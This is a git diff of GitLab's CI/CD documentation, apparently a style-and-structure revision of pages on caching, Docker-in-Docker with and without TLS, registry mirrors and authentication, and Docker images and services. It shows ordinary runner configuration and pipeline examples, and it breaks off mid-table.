diff options
Diffstat (limited to 'doc/ci')
62 files changed, 2080 insertions, 1967 deletions
diff --git a/doc/ci/README.md b/doc/ci/README.md index b1bcb578daf..b0ebbf920f9 100644 --- a/doc/ci/README.md +++ b/doc/ci/README.md @@ -99,7 +99,7 @@ GitLab CI/CD uses a number of concepts to describe and run your build and deploy | [Cache dependencies](caching/index.md) | Cache your dependencies for a faster execution. | | [GitLab Runner](https://docs.gitlab.com/runner/) | Configure your own runners to execute your scripts. | | [Pipeline efficiency](pipelines/pipeline_efficiency.md) | Configure your pipelines to run quickly and efficiently. | -| [Test cases](test_cases/index.md) | Configure your pipelines to run quickly and efficiently. | +| [Test cases](test_cases/index.md) | Configure your pipelines to run quickly and efficiently. <!--- this seems to be a duplicate description ---> | ## Configuration diff --git a/doc/ci/caching/index.md b/doc/ci/caching/index.md index bfc332e35b1..f2cb9500b2c 100644 --- a/doc/ci/caching/index.md +++ b/doc/ci/caching/index.md @@ -581,6 +581,9 @@ via the GitLab UI: 1. On the next push, your CI/CD job uses a new cache. +NOTE: +Each time you clear the cache manually, the [internal cache name](#where-the-caches-are-stored) is updated. The name uses the format `cache-<index>`, and the index increments by one each time. The old cache is not deleted. You can manually delete these files from the runner storage. + <!-- ## Troubleshooting Include any troubleshooting steps that you can foresee. If you know beforehand what issues diff --git a/doc/ci/chatops/index.md b/doc/ci/chatops/index.md index 48f8e595df6..5f661731660 100644 --- a/doc/ci/chatops/index.md +++ b/doc/ci/chatops/index.md @@ -57,7 +57,7 @@ functions available. Consider these best practices when creating ChatOps jobs: in the project, the job runs. The job itself can use existing [CI/CD variables](../variables/README.md#predefined-cicd-variables) like `GITLAB_USER_ID` to perform additional rights validation, but - these variables can be [overridden](../variables/README.md#priority-of-cicd-variables). + these variables can be [overridden](../variables/README.md#cicd-variable-precedence). ### Controlling the ChatOps reply diff --git a/doc/ci/cloud_deployment/ecs/quick_start_guide.md b/doc/ci/cloud_deployment/ecs/quick_start_guide.md index f75680ccd8c..b9ed38c2c03 100644 --- a/doc/ci/cloud_deployment/ecs/quick_start_guide.md +++ b/doc/ci/cloud_deployment/ecs/quick_start_guide.md @@ -211,7 +211,7 @@ Do not share the secret access key in a public place. You must save it in a secu ### Setup credentials in GitLab to let pipeline jobs access to ECS -You can register the access information in [GitLab Environment Variables](../../variables/README.md#create-a-custom-variable-in-the-ui). +You can register the access information in [GitLab Environment Variables](../../variables/README.md#custom-cicd-variables). These variables are injected into the pipeline jobs and can access the ECS API. 1. Go to **ecs-demo** project on GitLab. diff --git a/doc/ci/cloud_deployment/index.md b/doc/ci/cloud_deployment/index.md index 1e53414cd1e..e8f3fe3f4d9 100644 --- a/doc/ci/cloud_deployment/index.md +++ b/doc/ci/cloud_deployment/index.md @@ -117,7 +117,7 @@ After you have these prerequisites ready, follow these steps: 1. Make sure your AWS credentials are set up as CI/CD variables for your project. You can follow [the steps above](#run-aws-commands-from-gitlab-cicd) to complete this setup. 1. Add these variables to your project's `.gitlab-ci.yml` file, or in the project's - [CI/CD settings](../variables/README.md#create-a-custom-variable-in-the-ui): + [CI/CD settings](../variables/README.md#custom-cicd-variables): - `CI_AWS_ECS_CLUSTER`: The name of the AWS ECS cluster that you're targeting for your deployments. - `CI_AWS_ECS_SERVICE`: The name of the targeted service tied to your AWS ECS cluster. @@ -146,7 +146,7 @@ After you have these prerequisites ready, follow these steps: ``` You can create your `CI_AWS_ECS_TASK_DEFINITION_FILE` variable as a - [file-typed CI/CD variable](../variables/README.md#custom-cicd-variables-of-type-file) instead of a + [file-typed CI/CD variable](../variables/README.md#cicd-variable-types) instead of a regular CI/CD variable. If you choose to do so, set the variable value to be the full contents of the JSON task definition. You can then remove the JSON file from your project. @@ -257,7 +257,7 @@ pass three JSON input objects, based on existing templates: CI_AWS_EC2_DEPLOYMENT_FILE: 'aws/create_deployment.json' ``` - - Alternatively, you can provide these JSON objects as [file-typed CI/CD variables](../variables/README.md#custom-cicd-variables-of-type-file). + - Alternatively, you can provide these JSON objects as [file-typed CI/CD variables](../variables/README.md#cicd-variable-types). In your project, go to **Settings > CI/CD > Variables** and add the three variables listed above as file-typed CI/CD variables. For each variable, set the value to its corresponding JSON object. diff --git a/doc/ci/docker/using_docker_build.md b/doc/ci/docker/using_docker_build.md index 2091a80bdf2..90a33478239 100644 --- a/doc/ci/docker/using_docker_build.md +++ b/doc/ci/docker/using_docker_build.md @@ -31,9 +31,9 @@ to learn more about how these runners are configured. ### Use the shell executor -You can include Docker commands in your CI/CD jobs if your runner is configured to -use the `shell` executor. The `gitlab-runner` user runs the Docker commands, but -needs permission to run them. +To include Docker commands in your CI/CD jobs, you can configure your runner to +use the `shell` executor. In this configuration, the `gitlab-runner` user runs +the Docker commands, but needs permission to do so. 1. [Install](https://gitlab.com/gitlab-org/gitlab-runner/#installation) GitLab Runner. 1. [Register](https://docs.gitlab.com/runner/register/) a runner. @@ -81,76 +81,69 @@ Learn more about the [security of the `docker` group](https://blog.zopyx.com/on- ### Use the Docker executor with the Docker image (Docker-in-Docker) -You can use "Docker-in-Docker" to run commands in your CI/CD jobs: +"Docker-in-Docker" (`dind`) means: -- Register a runner that uses the Docker executor. -- Use the [Docker image](https://hub.docker.com/_/docker/) provided by Docker to - run the jobs that need Docker commands. +- Your registered runner uses the [Docker executor](https://docs.gitlab.com/runner/executors/docker.html). +- The executor uses a [container image of Docker](https://hub.docker.com/_/docker/), provided + by Docker, to run your CI/CD jobs. -The Docker image has all of the `docker` tools installed -and can run the job script in context of the image in privileged mode. +The Docker image has all of the `docker` tools installed and can run +the job script in context of the image in privileged mode. -The `docker-compose` command is not available in this configuration by default. -To use `docker-compose` in your job scripts, follow the `docker-compose` -[installation instructions](https://docs.docker.com/compose/install/). +We recommend you use [Docker-in-Docker with TLS enabled](#docker-in-docker-with-tls-enabled), +which is supported by [GitLab.com shared runners](../../user/gitlab_com/index.md#shared-runners). -An example project that uses this approach can be found here: <https://gitlab.com/gitlab-examples/docker>. - -WARNING: -When you enable `--docker-privileged`, you are effectively disabling all of -the security mechanisms of containers and exposing your host to privilege -escalation. Doing this can lead to container breakout. For more information, check -out the official Docker documentation on -[runtime privilege and Linux capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities). +You should always specify a specific version of the image, like `docker:19.03.12`. +If you use a tag like `docker:stable`, you have no control over which version is used. +Unpredictable behavior can result, especially when new versions are released. #### Limitations of Docker-in-Docker -Docker-in-Docker is the recommended configuration, but it is +Docker-in-Docker is the recommended configuration, but is not without its own challenges: -- When using Docker-in-Docker, each job is in a clean environment without the past - history. Concurrent jobs work fine because every build gets its own - instance of Docker engine so they don't conflict with each other. But this - also means that jobs can be slower because there's no caching of layers. -- By default, Docker 17.09 and higher uses `--storage-driver overlay2` which is - the recommended storage driver. See [Using the OverlayFS driver](#use-the-overlayfs-driver) - for details. -- Since the `docker:19.03.12-dind` container and the runner container don't share their - root file system, the job's working directory can be used as a mount point for +- **The `docker-compose` command**: This command is not available in this configuration by default. + To use `docker-compose` in your job scripts, follow the `docker-compose` + [installation instructions](https://docs.docker.com/compose/install/). +- **Cache**: Each job runs in a new environment. Concurrent jobs work fine, + because every build gets its own instance of Docker engine and they don't conflict with each other. + However, jobs can be slower because there's no caching of layers. +- **Storage drivers**: By default, earlier versions of Docker use the `vfs` storage driver, + which copies the file system for each job. Docker 17.09 and later use `--storage-driver overlay2`, which is + the recommended storage driver. See [Using the OverlayFS driver](#use-the-overlayfs-driver) for details. +- **Root file system**: Because the `docker:19.03.12-dind` container and the runner container don't share their + root file system, you can use the job's working directory as a mount point for child containers. For example, if you have files you want to share with a - child container, you may create a subdirectory under `/builds/$CI_PROJECT_PATH` - and use it as your mount point (for a more thorough explanation, check [issue - #41227](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41227)): + child container, you might create a subdirectory under `/builds/$CI_PROJECT_PATH` + and use it as your mount point. For a more detailed explanation, view [issue + #41227](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41227). ```yaml variables: MOUNT_POINT: /builds/$CI_PROJECT_PATH/mnt - script: - mkdir -p "$MOUNT_POINT" - docker run -v "$MOUNT_POINT:/mnt" my-docker-image ``` -In the examples below, we are using Docker images tags to specify a -specific version, such as `docker:19.03.12`. If tags like `docker:stable` -are used, you have no control over what version is used. This can lead to -unpredictable behavior, especially when new versions are -released. +#### Docker-in-Docker with TLS enabled -#### TLS enabled +> Introduced in GitLab Runner 11.11. -The Docker daemon supports connection over TLS and it's done by default -for Docker 19.03.12 or higher. This is the **suggested** way to use the -Docker-in-Docker service and -[GitLab.com shared runners](../../user/gitlab_com/index.md#shared-runners) -support this. +The Docker daemon supports connections over TLS. In Docker 19.03.12 and later, +TLS is the default. -##### Docker +WARNING: +This task enables `--docker-privileged`. When you do this, you are effectively disabling all of +the security mechanisms of containers and exposing your host to privilege +escalation. Doing this can lead to container breakout. For more information, +see the official Docker documentation about +[runtime privilege and Linux capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities). -> Introduced in GitLab Runner 11.11. +To use Docker-in-Docker with TLS enabled: 1. Install [GitLab Runner](https://docs.gitlab.com/runner/install/). -1. Register GitLab Runner from the command line to use `docker` and `privileged` +1. Register GitLab Runner from the command line. Use `docker` and `privileged` mode: ```shell @@ -164,18 +157,16 @@ support this. --docker-volumes "/certs/client" ``` - The above command registers a new runner to use the special - `docker:19.03.12` image, which is provided by Docker. **Notice that it's - using the `privileged` mode to start the build and service - containers.** If you want to use [Docker-in-Docker](https://www.docker.com/blog/docker-can-now-run-within-docker/) mode, you always - have to use `privileged = true` in your Docker containers. - - This also mounts `/certs/client` for the service and build - container, which is needed for the Docker client to use the - certificates inside of that directory. For more information on how - Docker with TLS works, check <https://hub.docker.com/_/docker/#tls>. + - This command registers a new runner to use the `docker:19.03.12` image. + To start the build and service containers, it uses the `privileged` mode. + If you want to use [Docker-in-Docker](https://www.docker.com/blog/docker-can-now-run-within-docker/), + you must always use `privileged = true` in your Docker containers. + - This command mounts `/certs/client` for the service and build + container, which is needed for the Docker client to use the + certificates in that directory. For more information on how + Docker with TLS works, see <https://hub.docker.com/_/docker/#tls>. - The above command creates a `config.toml` entry similar to this: + The previous command creates a `config.toml` entry similar to this: ```toml [[runners]] @@ -193,14 +184,14 @@ support this. [runners.cache.gcs] ``` -1. You can now use `docker` in the build script (note the inclusion of the - `docker:19.03.12-dind` service): +1. You can now use `docker` in the job script. Note the inclusion of the + `docker:19.03.12-dind` service: ```yaml image: docker:19.03.12 variables: - # When using dind service, we need to instruct docker to talk with + # When you use the dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. Docker 19.03 does this automatically @@ -210,9 +201,9 @@ support this. # The 'docker' hostname is the alias of the service container as described at # https://docs.gitlab.com/ee/ci/docker/using_docker_images.html#accessing-the-services. # - # Specify to Docker where to create the certificates, Docker will - # create them automatically on boot, and will create - # `/certs/client` that will be shared between the service and job + # Specify to Docker where to create the certificates. Docker + # creates them automatically on boot, and creates + # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" @@ -229,10 +220,12 @@ support this. - docker run my-docker-image /script/to/run/tests ``` -##### Kubernetes +#### Docker-in-Docker with TLS enabled in Kubernetes > [Introduced](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/issues/106) in GitLab Runner Helm Chart 0.23.0. +To use Docker-in-Docker with TLS enabled in Kubernetes: + 1. Using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), update the [`values.yml` file](https://gitlab.com/gitlab-org/charts/gitlab-runner/-/blob/00c1a2098f303dffb910714752e9a981e119f5b5/values.yaml#L133-137) @@ -251,14 +244,14 @@ support this. medium = "Memory" ``` -1. You can now use `docker` in the build script (note the inclusion of the - `docker:19.03.13-dind` service): +1. You can now use `docker` in the job script. Note the inclusion of the + `docker:19.03.13-dind` service: ```yaml image: docker:19.03.13 variables: - # When using dind service, we need to instruct docker to talk with + # When using dind service, you must instruct Docker to talk with # the daemon started inside of the service. The daemon is available # with a network connection instead of the default # /var/run/docker.sock socket. @@ -271,9 +264,9 @@ support this. # Kubernetes executor connects services to the job container # DOCKER_HOST: tcp://localhost:2376 # - # Specify to Docker where to create the certificates, Docker will - # create them automatically on boot, and will create - # `/certs/client` that will be shared between the service and job + # Specify to Docker where to create the certificates. Docker + # creates them automatically on boot, and creates + # `/certs/client` to share between the service and job # container, thanks to volume mount from config.toml DOCKER_TLS_CERTDIR: "/certs" # These are usually specified by the entrypoint, however the @@ -295,9 +288,9 @@ support this. - docker run my-docker-image /script/to/run/tests ``` -#### TLS disabled +#### Docker-in-Docker with TLS disabled -Sometimes there are legitimate reasons why you might want to disable TLS. +Sometimes you might have legitimate reasons to disable TLS. For example, you have no control over the GitLab Runner configuration that you are using. @@ -319,14 +312,14 @@ Assuming that the runner's `config.toml` is similar to: [runners.cache.gcs] ``` -You can now use `docker` in the build script (note the inclusion of the -`docker:19.03.12-dind` service): +You can now use `docker` in the job script. Note the inclusion of the +`docker:19.03.12-dind` service: ```yaml image: docker:19.03.12 variables: - # When using dind service we need to instruct docker, to talk with the + # When using dind service, you must instruct docker to talk with the # daemon started inside of the service. The daemon is available with # a network connection instead of the default /var/run/docker.sock socket. # @@ -340,7 +333,7 @@ variables: # DOCKER_HOST: tcp://docker:2375 # - # This will instruct Docker not to start over TLS. + # This instructs Docker not to start over TLS. DOCKER_TLS_CERTDIR: "" services: @@ -382,10 +375,10 @@ To make Docker available in the context of the image: --docker-volumes /var/run/docker.sock:/var/run/docker.sock ``` - This command registers a new runner to use the special - `docker:19.03.12` image, which is provided by Docker. **The command uses + This command registers a new runner to use the + `docker:19.03.12` image provided by Docker. The command uses the Docker daemon of the runner itself. Any containers spawned by Docker - commands are siblings of the runner rather than children of the runner.** + commands are siblings of the runner rather than children of the runner. This may have complications and limitations that are unsuitable for your workflow. Your `config.toml` file should now have an entry like this: @@ -405,7 +398,7 @@ To make Docker available in the context of the image: Insecure = false ``` -1. Use `docker` in the build script. You don't need to +1. Use `docker` in the job script. You don't need to include the `docker:19.03.12-dind` service, like you do when you're using the Docker-in-Docker executor: @@ -445,20 +438,20 @@ the implications of this method are: When the Docker daemon starts inside of the service container, it uses the default configuration. You may want to configure a [registry mirror](https://docs.docker.com/registry/recipes/mirror/) for -performance improvements and ensuring you don't reach DockerHub rate limits. +performance improvements and to ensure you don't reach Docker Hub rate limits. -##### Inside `.gitlab-ci.yml` +##### The service in the `.gitlab-ci.yml` file You can append extra CLI flags to the `dind` service to set the registry mirror: ```yaml services: - - name: docker:19.03.13-dind - command: ["--registry-mirror", "https://registry-mirror.example.com"] # Specify the registry mirror to use. + - name: docker:19.03.13-dind + command: ["--registry-mirror", "https://registry-mirror.example.com"] # Specify the registry mirror to use ``` -##### DinD service defined inside of GitLab Runner configuration +##### The service in the GitLab Runner configuration file > [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/27173) in GitLab Runner 13.6. @@ -495,7 +488,7 @@ Kubernetes: command = ["--registry-mirror", "https://registry-mirror.example.com"] ``` -##### Docker executor inside GitLab Runner configuration +##### The Docker executor in the GitLab Runner configuration file If you are a GitLab Runner administrator, you can use the mirror for every `dind` service. Update the @@ -528,7 +521,7 @@ picked up by the `dind` service. volumes = ["/opt/docker/daemon.json:/etc/docker/daemon.json:ro"] ``` -##### Kubernetes executor inside GitLab Runner configuration +##### The Kubernetes executor in the GitLab Runner configuration file > [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/3223) in GitLab Runner 13.6. @@ -556,7 +549,7 @@ kubectl create configmap docker-daemon --namespace gitlab-runner --from-file /tm ``` NOTE: -Make sure to use the namespace that GitLab Runner Kubernetes executor uses +Make sure to use the namespace that the GitLab Runner Kubernetes executor uses to create job pods in. After the ConfigMap is created, you can update the `config.toml` @@ -577,15 +570,15 @@ The configuration is picked up by the `dind` service. sub_path = "daemon.json" ``` -## Authenticating with registry in Docker-in-Docker +## Authenticate with registry in Docker-in-Docker -When you use Docker-in-Docker, the [normal authentication -methods](using_docker_images.html#define-an-image-from-a-private-container-registry) +When you use Docker-in-Docker, the +[standard authentication methods](using_docker_images.md#define-an-image-from-a-private-container-registry) don't work because a fresh Docker daemon is started with the service. ### Option 1: Run `docker login` -In [`before_script`](../yaml/README.md#before_script) run `docker +In [`before_script`](../yaml/README.md#before_script), run `docker login`: ```yaml @@ -618,12 +611,12 @@ are using the official `docker:19.03.13` image, the home directory is under `/root`. If you mount the configuration file, any `docker` command -that modifies the `~/.docker/config.json` (for example, `docker login`) +that modifies the `~/.docker/config.json` fails. For example, `docker login` fails, because the file is mounted as read-only. Do not change it from read-only, because problems occur. Here is an example of `/opt/.docker/config.json` that follows the -[`DOCKER_AUTH_CONFIG`](using_docker_images.md#determining-your-docker_auth_config-data) +[`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) documentation: ```json @@ -638,8 +631,8 @@ documentation: #### Docker -Update the [volume -mounts](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section) +Update the +[volume mounts](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section) to include the file. ```toml @@ -661,8 +654,7 @@ of this file. You can do this with a command like: kubectl create configmap docker-client-config --namespace gitlab-runner --from-file /opt/.docker/config.json ``` -Update the [volume -mounts](https://docs.gitlab.com/runner/executors/kubernetes.html#using-volumes) +Update the [volume mounts](https://docs.gitlab.com/runner/executors/kubernetes.html#using-volumes) to include the file. ```toml @@ -683,21 +675,19 @@ to include the file. ### Option 3: Use `DOCKER_AUTH_CONFIG` If you already have -[`DOCKER_AUTH_CONFIG`](using_docker_images.md#determining-your-docker_auth_config-data) +[`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) defined, you can use the variable and save it in `~/.docker/config.json`. -There are multiple ways to define this. For example: +There are multiple ways to define this authentication: -- Inside - [`pre_build_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) - inside of the runner configuration file. -- Inside [`before_script`](../yaml/README.md#before_script). -- Inside of [`script`](../yaml/README.md#script). +- In [`pre_build_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) + in the runner configuration file. +- In [`before_script`](../yaml/README.md#before_script). +- In [`script`](../yaml/README.md#script). -Below is an example of -[`before_script`](../yaml/README.md#before_script). The same commands -apply for any solution you implement. +The following example shows [`before_script`](../yaml/README.md#before_script). +The same commands apply for any solution you implement. ```yaml image: docker:19.03.13 @@ -718,10 +708,10 @@ build: - docker run my-docker-image /script/to/run/tests ``` -## Making Docker-in-Docker builds faster with Docker layer caching +## Make Docker-in-Docker builds faster with Docker layer caching When using Docker-in-Docker, Docker downloads all layers of your image every -time you create a build. Recent versions of Docker (Docker 1.13 and above) can +time you create a build. Recent versions of Docker (Docker 1.13 and later) can use a pre-existing image as a cache during the `docker build` step. This considerably speeds up the build process. @@ -737,9 +727,9 @@ as a cache source by using multiple `--cache-from` arguments. Any image that's u with the `--cache-from` argument must first be pulled (using `docker pull`) before it can be used as a cache source. -### Using Docker caching +### Docker caching example -Here's a `.gitlab-ci.yml` file showing how Docker caching can be used: +Here's a `.gitlab-ci.yml` file that shows how to use Docker caching: ```yaml image: docker:19.03.12 @@ -764,12 +754,12 @@ build: - docker push $CI_REGISTRY_IMAGE:latest ``` -The steps in the `script` section for the `build` stage can be summed up to: +In the `script` section for the `build` stage: 1. The first command tries to pull the image from the registry so that it can be used as a cache for the `docker build` command. -1. The second command builds a Docker image using the pulled image as a - cache (notice the `--cache-from $CI_REGISTRY_IMAGE:latest` argument) if +1. The second command builds a Docker image by using the pulled image as a + cache (see the `--cache-from $CI_REGISTRY_IMAGE:latest` argument) if available, and tags it. 1. The last two commands push the tagged Docker images to the container registry so that they may also be used as cache for subsequent builds. @@ -818,10 +808,10 @@ variables: ### Use the OverlayFS driver for every project -If you use your own [GitLab Runners](https://docs.gitlab.com/runner/), you +If you use your own [runners](https://docs.gitlab.com/runner/), you can enable the driver for every project by setting the `DOCKER_DRIVER` environment variable in the -[`[[runners]]` section of `config.toml`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section): +[`[[runners]]` section of the `config.toml` file](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section): ```toml environment = ["DOCKER_DRIVER=overlay2"] @@ -832,7 +822,7 @@ If you're running multiple runners, you have to modify all configuration files. Read more about the [runner configuration](https://docs.gitlab.com/runner/configuration/) and [using the OverlayFS storage driver](https://docs.docker.com/engine/userguide/storagedriver/overlayfs-driver/). -## Using the GitLab Container Registry +## Use the GitLab Container Registry After you've built a Docker image, you can push it up to the built-in [GitLab Container Registry](../../user/packages/container_registry/index.md#build-and-push-by-using-gitlab-cicd). @@ -842,13 +832,12 @@ After you've built a Docker image, you can push it up to the built-in ### `docker: Cannot connect to the Docker daemon at tcp://docker:2375. Is the docker daemon running?` This is a common error when you are using -[Docker in Docker](#use-the-docker-executor-with-the-docker-image-docker-in-docker) -v19.03 or higher. +[Docker-in-Docker](#use-the-docker-executor-with-the-docker-image-docker-in-docker) +v19.03 or later. -This occurs because Docker starts on TLS automatically, so you need to do some setup. -If: +This issue occurs because Docker starts on TLS automatically. -- This is the first time setting it up, carefully read - [using Docker in Docker workflow](#use-the-docker-executor-with-the-docker-image-docker-in-docker). -- You are upgrading from v18.09 or earlier, read our +- If this is your first time setting it up, read + [use the Docker executor with the Docker image](#use-the-docker-executor-with-the-docker-image-docker-in-docker). +- If you are upgrading from v18.09 or earlier, read our [upgrade guide](https://about.gitlab.com/blog/2019/07/31/docker-in-docker-with-docker-19-dot-03/). diff --git a/doc/ci/docker/using_docker_images.md b/doc/ci/docker/using_docker_images.md index e8028a862c4..173701ef358 100644 --- a/doc/ci/docker/using_docker_images.md +++ b/doc/ci/docker/using_docker_images.md @@ -9,23 +9,22 @@ type: concepts, howto You can run your CI/CD jobs in separate, isolated Docker containers. -When you run a Docker container on your local machine, it acts as a reproducible build environment. -You can run tests in the container, instead of testing on a dedicated CI/CD server. +If you run Docker on your local machine, you can run tests in the container, +rather than testing on a dedicated CI/CD server. To run CI/CD jobs in a Docker container, you need to: -- Register a runner that uses the Docker executor. Then all jobs run in a Docker container. -- Specify an image in your `.gitlab-ci.yml` file. The runner creates a container from this image - and runs the jobs in it. -- Optional. Specify other images in your `.gitlab-ci.yml` file. These containers are known as - ["services"](#what-is-a-service) and you can use them to run services like MySQL separately. +1. Register a runner so that all jobs run in Docker containers. Do this by choosing the Docker executor during registration. +1. Specify which container to run the jobs in. Do this by specifying an image in your `.gitlab-ci.yml` file. +1. Optional. Run other services, like MySQL, in containers. Do this by specifying [services](../services/index.md) + in your `.gitlab-ci.yml` file. ## Register a runner that uses the Docker executor To use GitLab Runner with Docker you need to [register a runner](https://docs.gitlab.com/runner/register/) that uses the Docker executor. -In this example, we first set up a temporary template to supply the services: +This example shows how to set up a temporary template to supply services: ```shell cat > /tmp/test-config.template.toml << EOF @@ -57,150 +56,20 @@ accessible during the build process. ## What is an image The `image` keyword is the name of the Docker image the Docker executor -runs to perform the CI tasks. +uses to run CI/CD jobs. -By default, the executor pulls images only from [Docker Hub](https://hub.docker.com/). -However, you can configure the location in the `gitlab-runner/config.toml` file. For example, -you can set the [Docker pull policy](https://docs.gitlab.com/runner/executors/docker.html#how-pull-policies-work) +By default, the executor pulls images from [Docker Hub](https://hub.docker.com/). +However, you can configure the registry location in the `gitlab-runner/config.toml` file. +For example, you can set the [Docker pull policy](https://docs.gitlab.com/runner/executors/docker.html#how-pull-policies-work) to use local images. -For more information about images and Docker Hub, read +For more information about images and Docker Hub, see the [Docker Fundamentals](https://docs.docker.com/engine/understanding-docker/) documentation. -## What is a service - -The `services` keyword defines another Docker image that's run during -your job. It's linked to the Docker image that the `image` keyword defines, -which allows you to access the service image during build time. - -The service image can run any application, but the most common use case is to -run a database container, for example, `mysql`. It's easier and faster to use an -existing image and run it as an additional container than to install `mysql` every -time the project is built. - -You're not limited to only database services. You can add as many -services you need to `.gitlab-ci.yml` or manually modify `config.toml`. -Any image found at [Docker Hub](https://hub.docker.com/) or your private Container Registry can be -used as a service. - -Services inherit the same DNS servers, search domains, and additional hosts as -the CI container itself. - -You can see some widely used services examples in the relevant documentation of -[CI services examples](../services/index.md). - -### How services are linked to the job - -To better understand how container linking works, read -[Linking containers together](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/). - -If you add `mysql` as service to your application, the image is -used to create a container that's linked to the job container. - -The service container for MySQL is accessible under the hostname `mysql`. -To access your database service, connect to the host named `mysql` instead of a -socket or `localhost`. Read more in [accessing the services](#accessing-the-services). - -### How the health check of services works - -Services are designed to provide additional features which are **network accessible**. -They may be a database like MySQL, or Redis, and even `docker:stable-dind` which -allows you to use Docker-in-Docker. It can be practically anything that's -required for the CI/CD job to proceed, and is accessed by network. - -To make sure this works, the runner: - -1. Checks which ports are exposed from the container by default. -1. Starts a special container that waits for these ports to be accessible. - -If the second stage of the check fails, it prints the warning: `*** WARNING: Service XYZ probably didn't start properly`. -This issue can occur because: - -- There is no opened port in the service. -- The service was not started properly before the timeout, and the port is not - responding. - -In most cases it affects the job, but there may be situations when the job -still succeeds even if that warning was printed. For example: - -- The service was started shortly after the warning was raised, and the job is - not using the linked service from the beginning. In that case, when the - job needed to access the service, it may have been already there waiting for - connections. -- The service container is not providing any networking service, but it's doing - something with the job's directory (all services have the job directory mounted - as a volume under `/builds`). In that case, the service does its job, and - because the job is not trying to connect to it, it does not fail. - -### What services are not for - -As mentioned before, this feature is designed to provide **network accessible** -services. A database is the simplest example of such a service. - -The services feature is not designed to, and does not, add any software from the -defined `services` image(s) to the job's container. - -For example, if you have the following `services` defined in your job, the `php`, -`node` or `go` commands are **not** available for your script, and the job fails: - -```yaml -job: - services: - - php:7 - - node:latest - - golang:1.10 - image: alpine:3.7 - script: - - php -v - - node -v - - go version -``` - -If you need to have `php`, `node` and `go` available for your script, you should -either: - -- Choose an existing Docker image that contains all required tools. -- Create your own Docker image, with all the required tools included, - and use that in your job. - -### Accessing the services - -Let's say that you need a Wordpress instance to test some API integration with -your application. You can then use for example the -[`tutum/wordpress`](https://hub.docker.com/r/tutum/wordpress/) image in your -`.gitlab-ci.yml` file: - -```yaml -services: - - tutum/wordpress:latest -``` - -If you don't [specify a service alias](#available-settings-for-services), -when the job runs, `tutum/wordpress` is started. You have -access to it from your build container under two hostnames: - -- `tutum-wordpress` -- `tutum__wordpress` - -Hostnames with underscores are not RFC valid and may cause problems in third-party -applications. - -The default aliases for the service's hostname are created from its image name -following these rules: - -- Everything after the colon (`:`) is stripped. -- Slash (`/`) is replaced with double underscores (`__`) and the primary alias - is created. -- Slash (`/`) is replaced with a single dash (`-`) and the secondary alias is - created (requires GitLab Runner v1.1.0 or higher). - -To override the default behavior, you can -[specify a service alias](#available-settings-for-services). - -## Define `image` and `services` from `.gitlab-ci.yml` +## Define `image` in the `.gitlab-ci.yml` file You can define an image that's used for all jobs, and a list of -services that you want to use during build time: +services that you want to use during runtime: ```yaml default: @@ -223,232 +92,61 @@ The image name must be in one of the following formats: - `image: <image-name>:<tag>` - `image: <image-name>@<digest>` -It's also possible to define different images and services per job: - -```yaml -default: - before_script: - - bundle install - -test:2.6: - image: ruby:2.6 - services: - - postgres:11.7 - script: - - bundle exec rake spec - -test:2.7: - image: ruby:2.7 - services: - - postgres:12.2 - script: - - bundle exec rake spec -``` - -Or you can pass some [extended configuration options](#extended-docker-configuration-options) -for `image` and `services`: - -```yaml -default: - image: - name: ruby:2.6 - entrypoint: ["/bin/bash"] - - services: - - name: my-postgres:11.7 - alias: db-postgres - entrypoint: ["/usr/local/bin/db-postgres"] - command: ["start"] - - before_script: - - bundle install - -test: - script: - - bundle exec rake spec -``` - -## Passing CI/CD variables to services - -You can also pass custom CI/CD [variables](../variables/README.md) -to fine tune your Docker `images` and `services` directly in the `.gitlab-ci.yml` file. -For more information, read about [`.gitlab-ci.yml` defined variables](../variables/README.md#gitlab-ciyml-defined-variables). - -```yaml -# The following variables are automatically passed down to the Postgres container -# as well as the Ruby container and available within each. -variables: - HTTPS_PROXY: "https://10.1.1.1:8090" - HTTP_PROXY: "https://10.1.1.1:8090" - POSTGRES_DB: "my_custom_db" - POSTGRES_USER: "postgres" - POSTGRES_PASSWORD: "example" - PGDATA: "/var/lib/postgresql/data" - POSTGRES_INITDB_ARGS: "--encoding=UTF8 --data-checksums" - -services: - - name: postgres:11.7 - alias: db - entrypoint: ["docker-entrypoint.sh"] - command: ["postgres"] - -image: - name: ruby:2.6 - entrypoint: ["/bin/bash"] - -before_script: - - bundle install - -test: - script: - - bundle exec rake spec -``` - ## Extended Docker configuration options > Introduced in GitLab and GitLab Runner 9.4. -When configuring the `image` or `services` entries, you can use a string or a map as -options: +You can use a string or a map for the `image` or `services` entries: -- When using a string as an option, it must be the full name of the image to use - (including the Registry part if you want to download the image from a Registry +- Strings must include the full image name + (including the registry, if you want to download the image from a registry other than Docker Hub). -- When using a map as an option, then it must contain at least the `name` - option, which is the same name of the image as used for the string setting. +- Maps must contain at least the `name` option, + which is the same image name as used for the string setting. For example, the following two definitions are equal: -1. Using a string as an option to `image` and `services`: +- A string for `image` and `services`: - ```yaml - image: "registry.example.com/my/image:latest" - - services: - - postgresql:9.4 - - redis:latest - ``` - -1. Using a map as an option to `image` and `services`. The use of `image:name` is - required: - - ```yaml - image: - name: "registry.example.com/my/image:latest" - - services: - - name: postgresql:9.4 - - name: redis:latest - ``` - -### Available settings for `image` - -> Introduced in GitLab and GitLab Runner 9.4. - -| Setting 